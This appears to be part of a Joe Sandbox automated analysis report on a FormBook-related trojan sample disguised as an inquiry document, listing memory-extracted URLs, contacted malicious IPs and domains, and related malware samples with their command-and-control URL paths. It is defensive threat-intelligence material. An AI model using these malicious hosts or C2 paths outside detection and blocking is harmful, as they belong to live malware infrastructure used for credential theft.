                                                                                                                                https://oss.wanjd.cn/owx/read/wx-read/cos/css/llc.css?ver=0002replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://assets.iv.lt/images/icon.pngfirefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://oss.wanjd.cn/owx/read/wx-read/cos/css/index.css?ver=0009replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  		unknown
                                                                                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchreplace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://oss.wanjd.cn/owx/read/wx-read/cos/css/hui/hui.css?v=0001replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://www.arsys.es/backup?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=backupreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.arsys.es/hosting?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=hostingreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://www.iv.lt/talpinimo-planai/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.arsys.es/dominios/gestion?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=resellreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.arsys.es/dominios/ssl?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=sslreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://d1di2lzuh97fh2.cloudfront.net/files/2j/2jy/2jy5g9.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.iv.lt/neribotas-svetainiu-talpinimas/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://upx.sf.netAmcache.hve.7.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://www.iv.lt/svetainiu-kurimo-irankis/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.arsys.es/crear/tienda?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=tiendasreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://oss.wanjd.cn/owx/ys_share/daily/back1.pngreplace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0INQ No. HDPE-16-GM-00- PI-INQ-3001.exefalse
                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://www.arsys.es/partners?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=partnersreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://www.iv.lt/el-pasto-filtras/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ac.ecosia.org/autocomplete?q=replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.arsys.es/herramientas/seo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=seoreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://oss.wanjd.cn/owx/read/wx-read/cos/css/animate.min.css?v=20230919001replace.exe, 00000015.00000002.3685026177.00000000049B4000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004534000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://www.arsys.es/correo?utm_source=parking&amp;utm_medium=link&amp;utm_campaign=correoreplace.exe, 00000015.00000002.3685026177.00000000041DA000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957replace.exe, 00000015.00000002.3685026177.0000000004FFC000.00000004.10000000.00040000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.0000000004B7C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=replace.exe, 00000015.00000002.3687863035.0000000007D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.solesense.proyTVsQcNOAKqLIKj.exe, 00000016.00000002.3686434671.000000000595C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://www.iv.lt/sertifikatai/replace.exe, 00000015.00000002.3685026177.0000000003D24000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000015.00000002.3687654613.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, yTVsQcNOAKqLIKj.exe, 00000016.00000002.3684184525.00000000038A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.1776898436.000000001E754000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                                          		high

                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                          Public IPs

                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                          162.240.81.18
                                                                                                                                                                          		aprovapapafox.comUnited States
                                                                                                                                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                                                                                                                                          205.234.233.38
                                                                                                                                                                          		www.theertyuiergthjk.homesUnited States
                                                                                                                                                                          		23352SERVERCENTRALUStrue
                                                                                                                                                                          79.98.25.1
                                                                                                                                                                          		www.maxiwalls.comLithuania
                                                                                                                                                                          		62282RACKRAYUABRakrejusLTtrue
                                                                                                                                                                          217.76.128.34
                                                                                                                                                                          		www.colchondealquiler.comSpain
                                                                                                                                                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                                                          178.211.137.59
                                                                                                                                                                          		www.skibinscy-finanse.plUkraine
                                                                                                                                                                          		31214TIS-DIALOG-ASRUtrue
                                                                                                                                                                          3.125.172.46
                                                                                                                                                                          		lb.webnode.ioUnited States
                                                                                                                                                                          		16509AMAZON-02UStrue
                                                                                                                                                                          64.190.62.22
                                                                                                                                                                          		www.paydayloans3.shopUnited States
                                                                                                                                                                          		11696NBS11696UStrue
                                                                                                                                                                          52.175.38.24
                                                                                                                                                                          		fix01.pfw.djamxtvyk.cloudland3.comUnited States
                                                                                                                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                          203.161.46.103
                                                                                                                                                                          		www.fairmarty.topMalaysia
                                                                                                                                                                          		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                                          91.195.240.19
                                                                                                                                                                          		parkingpage.namecheap.comGermany
                                                                                                                                                                          		47846SEDO-ASDEfalse
                                                                                                                                                                          103.93.124.160
                                                                                                                                                                          		vf3ba6qx.as22566.comHong Kong
                                                                                                                                                                          		59371DNC-ASDimensionNetworkCommunicationLimitedHKtrue

                                                                                                                                                                          General Information

                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                          Analysis ID:1431986
                                                                                                                                                                          Start date and time:2024-04-26 07:40:06 +02:00
                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                          Overall analysis duration:0h 11m 53s
                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                          Report type:full
                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                          Number of analysed new started processes analysed:27
                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                          Number of injected processes analysed:2
                                                                                                                                                                          Technologies:
                                                                                                                                                                          • HCA enabled
                                                                                                                                                                          • EGA enabled
                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                          Sample name:INQ No. HDPE-16-GM-00- PI-INQ-3001.exe
                                                                                                                                                                          Detection:MAL
                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@10/7@18/11
                                                                                                                                                                          EGA Information:
                                                                                                                                                                          • Successful, ratio: 75%
                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 92%
                                                                                                                                                                          • Number of executed functions: 169
                                                                                                                                                                          • Number of non-executed functions: 235
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          07:40:56API Interceptor1x Sleep call for process: INQ No. HDPE-16-GM-00- PI-INQ-3001.exe modified
                                                                                                                                                                          07:41:19API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                          08:45:39API Interceptor10306186x Sleep call for process: replace.exe modified

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          162.240.81.18shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • www.tavernadoheroi.store/3g97/
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.aprovapapafox.com/aleu/
                                                                                                                                                                          Payment_Advice.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.agoraeubebo.com/niik/
                                                                                                                                                                          bin.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.agoraeubebo.com/nrup/
                                                                                                                                                                          ccWXalS8xg.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.agoraeubebo.com/nrup/?jH1=cn4P66&Gv=dWrD1PFadq7V5KkT4LFo0o0ceK+Fdoxu4bG3e9Abb7XIEj/TR5WidBvHl5Crj+jPOsSaqiQVqCgntzF+MJy+srxryBjk62On/DUjB7mkf9HqIW/2fSnYTpA=
                                                                                                                                                                          1No1dv4uLe.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.agoraeubebo.com/nrup/
                                                                                                                                                                          Sf5Aw7E8Cu.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.agoraeubebo.com/nrup/
                                                                                                                                                                          Petro Masila 105321.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.marinamaquiagens.online/4vs4/
                                                                                                                                                                          PO 027371.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.marinamaquiagens.online/4vs4/
                                                                                                                                                                          Sandflugters.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.tintasmaiscor.com/tsq7/
                                                                                                                                                                          205.234.233.38INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.theertyuiergthjk.homes/aleu/
                                                                                                                                                                          79.98.25.1International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.noxnoxhome.com/ve92/?KVvTZtEp=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNSm79P5Sc0NLZLCPEw==&ixo=GL0X
                                                                                                                                                                          International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.noxnoxhome.com/ve92/?UTU=yvUt0Xc&NtBTjpl=3Lb7GTp0i1UWz50Z1NTpZr264EbzejLIOiMk55K1X/ijp3vnWUvEjglcNReS0v1pTCwd
                                                                                                                                                                          00726736625241525.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?T6d7v=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe&P9I=5Nqp
                                                                                                                                                                          Ekli_fatura.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?a_=u7nXv&67=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                                                          00023134214252615.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?0hnL5J=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqbXsjSn19dkaRA==&1d=iNJ5G
                                                                                                                                                                          Kopija_bankovne_uplate.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?ibHgv7=x5rx0ZN3oO-G&wO8WV=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/C+oTtjVbLxPInHRTKy1tLVwIe
                                                                                                                                                                          003786546788765.PDF.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?F_4=9SV3rDO4hnDB&U3mb=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/Bqbjoiin18dsOQQ==
                                                                                                                                                                          Copie_de_plata_bancara.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?ILqh=0AsVJSkSvC6-W&yRBmiBA-=45MeeAD4Y8e2mqpl94/vp49GzIZF/JSgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/BqZm0t1L18dsSRA==
                                                                                                                                                                          U_prilogu_je_predracun.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?fk0=89DiTmjnfCUhvYsc&kJZ5QC=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzKXxpHTL6/QrDg==
                                                                                                                                                                          Iqgbhvnaowuspb.exeGet hashmaliciousDBatLoader, FormBookBrowse
                                                                                                                                                                          • www.christmatoy.com/6qne/?D15HD=_t_lMOKbpZu3O9&9WZHdBH=45MeeAD4Y8e2mqpq44/Fvp9d3MZR+OOgjBrZQamPfzy89FNMTy66VAy6fvepqGkhnz/kvI1ROEM4MGyKOy/CzITtjVbGwuQSRA==

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          parkingpage.namecheap.comBM-FM_NR.24040718PDF.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO0424024.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          shipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          Pago pendiente.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO0423024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO0423023.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          Ordine_doc_419024001904.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO_La-Tanerie04180240124.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          PO_La-Tanerie04180240124.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 91.195.240.19
                                                                                                                                                                          vf3ba6qx.as22566.comINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 103.93.124.160
                                                                                                                                                                          www.skibinscy-finanse.plINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          www.maxiwalls.comRFQ 0400-ENPI-RQMA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          fix01.pfw.djamxtvyk.cloudland3.comINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 52.175.38.24
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 52.175.38.24
                                                                                                                                                                          www.paydayloans3.shopshipping document.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 64.190.62.22
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 64.190.62.22
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 64.190.62.22
                                                                                                                                                                          lb.webnode.ioINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 3.125.172.46
                                                                                                                                                                          http://renovaciondepatentes.webnode.esGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 3.125.172.46
                                                                                                                                                                          file.exeGet hashmaliciousRedLine, SmokeLoaderBrowse
                                                                                                                                                                          • 3.73.27.108
                                                                                                                                                                          www.fairmarty.topINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 203.161.46.103
                                                                                                                                                                          www.theertyuiergthjk.homesINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 205.234.233.38
                                                                                                                                                                          www.colchondealquiler.comINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 217.76.128.34
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 217.76.128.34

                                                                                                                                                                          ASNs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          RACKRAYUABRakrejusLTRFQ 0400-ENPI-RQMA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          INQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          NQYYUvHu8f.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                          • 195.181.245.38
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          payment form.doc.bat.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                          • 185.5.53.18
                                                                                                                                                                          International Bank Transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          International Bank transfer.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 79.98.25.1
                                                                                                                                                                          4df902f11590d27189e9113ed654b0481.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 212.24.99.48
                                                                                                                                                                          IMG001.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                          • 62.77.152.0
                                                                                                                                                                          S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                                                                                                                                                          • 194.135.86.146
                                                                                                                                                                          TIS-DIALOG-ASRUINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          HYCO_Invoices MS2 & MS3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 178.211.137.59
                                                                                                                                                                          llADOrptJY.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 185.234.121.165
                                                                                                                                                                          M2CRoPxCDK.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 213.149.20.214
                                                                                                                                                                          https://r20.rs6.net/tn.jsp?f=001aWvo3AAHeKpzw4Mz_sgYedpUawImPJsIps10Y8KYyNgYNz9veso7-cqLq8Ea4Kz4hKxMhfMBFtf-ffFtVC0q7ivGR36wf1VR8lyGBPIGdyfvSdYQA-i_Ls0DZQM2OGfs5QV_OFuzyeVR1SlSz9DgdpNGEtqd-Xjg&c=&ch=#Y2xpZW50c2VydmljZXNAYmFycm93aGFubGV5LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 178.211.133.68
                                                                                                                                                                          LhzvaAYMk3.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 185.234.121.164
                                                                                                                                                                          Ship'_particular_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          MT_PAPA-AGENCY_APPOINTMENT_AND_PDA_QUERY_pdf.exeGet hashmaliciousAgentTesla, zgRATBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          r20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          #U00d6DEME_FATURASI.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 178.211.133.50
                                                                                                                                                                          SERVERCENTRALUSINQ No.KP-50-000-PS-IN-INQ-0027.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 205.234.233.38
                                                                                                                                                                          Yui1pUgieI.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 205.234.173.1
